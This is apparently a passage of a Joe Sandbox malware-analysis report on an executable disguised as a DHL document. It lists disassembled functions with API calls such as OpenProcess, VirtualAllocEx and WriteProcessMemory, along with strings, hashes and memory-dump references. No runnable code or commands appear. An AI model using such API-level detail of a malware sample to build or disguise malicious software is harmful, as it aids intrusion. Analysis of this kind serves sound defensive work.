Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 5185918a845fcdd9aceb98c9b0b4cf673fb398ae1863ed5e9ce3ed2012f917b2
Instruction ID: 79afb20e9566886d2cdd39e5621b3e7b1233f217922f30f39840716d7f77f868
Opcode Fuzzy Hash: 5185918a845fcdd9aceb98c9b0b4cf673fb398ae1863ed5e9ce3ed2012f917b2
Instruction Fuzzy Hash: B001D872800B118FCB30AF66D880803FBF9BE602063048A3FD19252A30C3B4A988CF85

Function 0042D73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0042D752

Part of subcall function 004229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042D7D1,00000000,00000000,00000000,00000000,?,0042D7F8,00000000,00000007,00000000,?,0042DBF5,00000000), ref: 004229DE
Part of subcall function 004229C8: GetLastError.KERNEL32(00000000,?,0042D7D1,00000000,00000000,00000000,00000000,?,0042D7F8,00000000,00000007,00000000,?,0042DBF5,00000000,00000000), ref: 004229F0

_free.LIBCMT ref: 0042D764
_free.LIBCMT ref: 0042D776
_free.LIBCMT ref: 0042D788
_free.LIBCMT ref: 0042D79A

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: abc00fba19c6e91fa9deaf960f98d5961126151f6999db5aabdc3789142fd0b0
Instruction ID: 9e1c207d8a0d9f7407614b5cfa84085a86f8c1a38e624d5d5de8273868220900
Opcode Fuzzy Hash: abc00fba19c6e91fa9deaf960f98d5961126151f6999db5aabdc3789142fd0b0
Instruction Fuzzy Hash: 63F0ECB2B44224AB9621FB65FAC5C1777DDBB88715BE40D1AF048D7601C76CFC80866C

Function 00455C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 00455C58
GetWindowTextW.USER32(00000000,?,00000100), ref: 00455C6F
MessageBeep.USER32(00000000), ref: 00455C87
KillTimer.USER32(?,0000040A), ref: 00455CA3
EndDialog.USER32(?,00000001), ref: 00455CBD

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 216099eb2b955b81a1792f92980d30318e7a680943043a079a3d001227e67805
Instruction ID: 32dd5cd1801b477c65f7b53c62ab59eedc3f083d42b01472c63915e64471c120
Opcode Fuzzy Hash: 216099eb2b955b81a1792f92980d30318e7a680943043a079a3d001227e67805
Instruction Fuzzy Hash: C6018B305007049BFB215B10DD9EFBA77B8BF00706F00057EA553B14E2D7F459488B59

Function 004222A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 004222BE

Part of subcall function 004229C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0042D7D1,00000000,00000000,00000000,00000000,?,0042D7F8,00000000,00000007,00000000,?,0042DBF5,00000000), ref: 004229DE
Part of subcall function 004229C8: GetLastError.KERNEL32(00000000,?,0042D7D1,00000000,00000000,00000000,00000000,?,0042D7F8,00000000,00000007,00000000,?,0042DBF5,00000000,00000000), ref: 004229F0

_free.LIBCMT ref: 004222D0
_free.LIBCMT ref: 004222E3
_free.LIBCMT ref: 004222F4
_free.LIBCMT ref: 00422305

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5ee93e41e12c7ffbbc2cf98eb2c60c47a2bfc1de676cb4884282ddf3e87377f
Instruction ID: 0b8c2972e45432dc30bbcc891f9b4d0b469a72404b429d80875f93a0bccd7faa
Opcode Fuzzy Hash: d5ee93e41e12c7ffbbc2cf98eb2c60c47a2bfc1de676cb4884282ddf3e87377f
Instruction Fuzzy Hash: 04F030F8A00131EB8652BF55BD81C493B64FF19751781066FF410D2272C7B904919BAC

Function 004095C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 004095D4
StrokeAndFillPath.GDI32(?,?,004471F7,00000000,?,?,?), ref: 004095F0
SelectObject.GDI32(?,00000000), ref: 00409603
DeleteObject.GDI32 ref: 00409616
StrokePath.GDI32(?), ref: 00409631

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 37b56608fd0a9edbbd3517e72b309d242598582344d7d5688000c0e732398a37
Instruction ID: b4656f6ba40105e4bde705fbcafd01e4f7162818cf746b4be2cdf904052431e7
Opcode Fuzzy Hash: 37b56608fd0a9edbbd3517e72b309d242598582344d7d5688000c0e732398a37
Instruction Fuzzy Hash: 6AF0AF71006604EBCB964F65EC5CB693F61BB02362F008238F425651F2C73589A1DF2C

Function 00420F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 004210F9
__freea.LIBCMT ref: 00421117

Part of subcall function 00421537: _free.LIBCMT ref: 0042154F

Strings

am/pm, xrefs: 0042117A
a/p, xrefs: 004211DE

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 6239c0da9ff634ac9cefcff382925dcf8355d0b3b7c7384fffb35dc4a677069a
Instruction ID: c5e4698813a9c4af943c3db86f69e1997b95dafd2aff0732bbe73b9414966e94
Opcode Fuzzy Hash: 6239c0da9ff634ac9cefcff382925dcf8355d0b3b7c7384fffb35dc4a677069a
Instruction Fuzzy Hash: 19D1F431B00225DADB24CF68E4457BBB7B2EF25300FA4415BE901ABB61D37D9D81CB59

Function 004761D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON

Download Yara Rule

APIs

Part of subcall function 00410242: EnterCriticalSection.KERNEL32(004C070C,004C1884,?,?,0040198B,004C2518,?,?,?,003F12F9,00000000), ref: 0041024D
Part of subcall function 00410242: LeaveCriticalSection.KERNEL32(004C070C,?,0040198B,004C2518,?,?,?,003F12F9,00000000), ref: 0041028A

Part of subcall function 004100A3: __onexit.LIBCMT ref: 004100A9

__Init_thread_footer.LIBCMT ref: 00476238

Part of subcall function 004101F8: EnterCriticalSection.KERNEL32(004C070C,?,?,00408747,004C2514), ref: 00410202
Part of subcall function 004101F8: LeaveCriticalSection.KERNEL32(004C070C,?,00408747,004C2514), ref: 00410235

Part of subcall function 0046359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004635E4
Part of subcall function 0046359C: LoadStringW.USER32(004C2390,?,00000FFF,?), ref: 0046360A

Strings

x#L, xrefs: 0047633A
x#L, xrefs: 0047636F
x#L, xrefs: 00476353

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
String ID: x#L$x#L$x#L
API String ID: 1072379062-3109749233
Opcode ID: 0775ebd57bc0e65b7b91e1b99fe4eee2b0394c9b9cd4a785b3126e4f4301e16a
Instruction ID: 64644cbfe21e81e3d8290094617c863be5274d764b31de8964612e44997157cf
Opcode Fuzzy Hash: 0775ebd57bc0e65b7b91e1b99fe4eee2b0394c9b9cd4a785b3126e4f4301e16a
Instruction Fuzzy Hash: C7C18171A00509AFCB15DF58C890EFEB7BAEF48304F15806EE9099B291D778ED45CB54

Function 00425AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE

Download Yara Rule

Strings

JO?, xrefs: 00425BA8, 00425C6C

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID:
String ID: JO?
API String ID: 0-1137422323
Opcode ID: eabc6ac64bf6bd6d2587887213e2c3239758e657dc529657201679f9eb187f5e
Instruction ID: 42bf14f644f9c70790bf9e70532f370fee053671a2c07c4e20b76aa06930915e
Opcode Fuzzy Hash: eabc6ac64bf6bd6d2587887213e2c3239758e657dc529657201679f9eb187f5e
Instruction Fuzzy Hash: F6511471F006299FCB209FA6E845FEFBFB4AF05314F90005BF405A7291E6799942CB69

Function 00428A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00428B6E
GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00428B7A
__dosmaperr.LIBCMT ref: 00428B81

Strings

.A, xrefs: 00428A63

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ByteCharErrorLastMultiWide__dosmaperr
String ID: .A
API String ID: 2434981716-2826776520
Opcode ID: 131ef08a987c4dd4d9255f4d742dd388d46d7bb78814c50dfcd2795cd6d4ecfe
Instruction ID: 2bf43f7b5097ca5df13844b0e462b77683e189a96c08f26ea9d9117d1d311627
Opcode Fuzzy Hash: 131ef08a987c4dd4d9255f4d742dd388d46d7bb78814c50dfcd2795cd6d4ecfe
Instruction Fuzzy Hash: 38419B70705065AFDB249F24E880A7E3FA5DB86304F2841AFF88587642DE399C13879C

Function 00452716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0045B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004521D0,?,?,00000034,00000800,?,00000034), ref: 0045B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00452760

Part of subcall function 0045B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004521FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0045B3F8

Part of subcall function 0045B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0045B355
Part of subcall function 0045B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00452194,00000034,?,?,00001004,00000000,00000000), ref: 0045B365
Part of subcall function 0045B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00452194,00000034,?,?,00001004,00000000,00000000), ref: 0045B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 004527CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0045281A

Strings

@, xrefs: 00452832

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: dd9a91d6a072d4fcc85a7a71ff187ec7cd56c2a0713f776e6c93ad0c9c5991b1
Instruction ID: e90668d93938a6279794ad72d79abc866fc818a7bee1e7e1b9a656a0eacace2f
Opcode Fuzzy Hash: dd9a91d6a072d4fcc85a7a71ff187ec7cd56c2a0713f776e6c93ad0c9c5991b1
Instruction Fuzzy Hash: 8A413072900218BFDB11DFA4CD81AEEBBB8EF09304F00405AFA55B7181DB746E49CBA4

Function 0042172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL-DOC83972025-1.exe,00000104), ref: 00421769
_free.LIBCMT ref: 00421834
_free.LIBCMT ref: 0042183E

Strings

C:\Users\user\Desktop\DHL-DOC83972025-1.exe, xrefs: 00421760, 00421767, 00421796, 004217CE

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\DHL-DOC83972025-1.exe
API String ID: 2506810119-4112319811
Opcode ID: 2832ee6f2c2c3f58f2def3893771a0290dbc36084f807ca731990cf8b3b2db84
Instruction ID: 1ea8e1ab5315a3f54a44d33a7c22d0e7cdba99f2ca4594f1815c1ad48fee725b
Opcode Fuzzy Hash: 2832ee6f2c2c3f58f2def3893771a0290dbc36084f807ca731990cf8b3b2db84
Instruction Fuzzy Hash: 30318375B00228ABDB21DF99A885D9FBBBCEB95310B9041ABF404D7221D6748E40CB98

Function 0045C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0045C306
DeleteMenu.USER32(?,00000007,00000000), ref: 0045C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,004C1990,00DE4D98), ref: 0045C395

Strings

0, xrefs: 0045C2DF

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: 1425a686ac82443ea7252776575d4838a706adf5f26b9009950c577c51ef2059
Instruction ID: add060372f03583cecbcdaf44b3f711b842cc66fec8595c972d70fc03e72a044
Opcode Fuzzy Hash: 1425a686ac82443ea7252776575d4838a706adf5f26b9009950c577c51ef2059
Instruction Fuzzy Hash: 7C41A0312043059FD720DF25D884B5BBBE4AF85315F048A1EFDA597392D738A908CB6A

Function 00484416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0048CC08,00000000,?,?,?,?), ref: 004844AA
GetWindowLongW.USER32 ref: 004844C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 004844D7

Strings

SysTreeView32, xrefs: 0048447C

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: afe2ad2cef35db5cbcafa7ebd194f7480a4ad15c5cd822b730c08d1f026c6f02
Instruction ID: 2cf99836bc4f48fdab76a98b0447a851685c2ace728a725cdfaef6106466cd33
Opcode Fuzzy Hash: afe2ad2cef35db5cbcafa7ebd194f7480a4ad15c5cd822b730c08d1f026c6f02
Instruction Fuzzy Hash: 3F31C131100206AFDB11AE78DC45BEF77A9EB48734F204B2AF975A22E0D778EC508764

Function 00456E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

SysReAllocString.OLEAUT32(?,?), ref: 00456EED
VariantCopyInd.OLEAUT32(?,?), ref: 00456F08
VariantClear.OLEAUT32(?), ref: 00456F12

Strings

*jE, xrefs: 00456E8B, 00456E90, 00456EF8

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: Variant$AllocClearCopyString
String ID: *jE
API String ID: 2173805711-1396648982
Opcode ID: e2fb6829a1ca3b16d0031f8432823324313d5630aeaa728750f02c722f096386
Instruction ID: 99c24ddcb65b185a27d1f66cb27b117fc476fe0d11e576f07aec29c828396c7b
Opcode Fuzzy Hash: e2fb6829a1ca3b16d0031f8432823324313d5630aeaa728750f02c722f096386
Instruction Fuzzy Hash: 4931D572B04209DFCB05AF64E8918BE7776EF41301B5104AAF9064F3A2C7389916DBD9

Function 0047304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0047335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00473077,?,?), ref: 00473378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0047307A
_wcslen.LIBCMT ref: 0047309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00473106

Strings

255.255.255.255, xrefs: 00473095, 0047309A

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 04a1b72b5d4d5c9ca727ec21764a4fa63870153be77be0588000162e723cb9ca
Instruction ID: df8d1bb0e29c041594ad45fb59a291a3d65859afcdc4808d2d78e24de66b505a
Opcode Fuzzy Hash: 04a1b72b5d4d5c9ca727ec21764a4fa63870153be77be0588000162e723cb9ca
Instruction Fuzzy Hash: 773104392002459FCB20DF28C585EEA77E0EF14319F64C09AE9198F392DB3AEE45D765

Function 00484653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00484705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00484713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0048471A

Strings

msctls_updown32, xrefs: 00484684

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 7aec3c8bedd70fa77579d7593d362f490542b86dfa62499b80c47dc2662f7215
Instruction ID: ac5090f713269a23a6e3698d3d26a0c0042a83fb5f1205bcf89921b4507b2825
Opcode Fuzzy Hash: 7aec3c8bedd70fa77579d7593d362f490542b86dfa62499b80c47dc2662f7215
Instruction Fuzzy Hash: 4A214CB5600209AFDB11EF64DCC1DBB37ADEB8A398B14045AFA009B361DB74EC11CB64

Function 004595AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0045961D

Strings

#notrayicon, xrefs: 004595B7
#requireadmin, xrefs: 004595D9
#OnAutoItStartRegister, xrefs: 004595F3

Memory Dump Source

Source File: 00000000.00000002.1267738006.00000000003F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true

Associated: 00000000.00000002.1267721473.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.000000000048C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267791640.00000000004B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267840670.00000000004BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1267861882.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3f0000_DHL-DOC83972025-1.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: aac3d89676a5db8086c53a11041831d0a520b01c21193d90fa502258d8950bcc
Instruction ID: 38d54739f330acf163edd163feb456cba4994d2f0005ec645b1fab792eb184f7
Opcode Fuzzy Hash: aac3d89676a5db8086c53a11041831d0a520b01c21193d90fa502258d8950bcc
Instruction Fuzzy Hash: 6B214672204214A6C731BA25D802FBB73D89FA0311F54443BFD49DB282EB5CAD9EC29D

Function 004837B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00483840
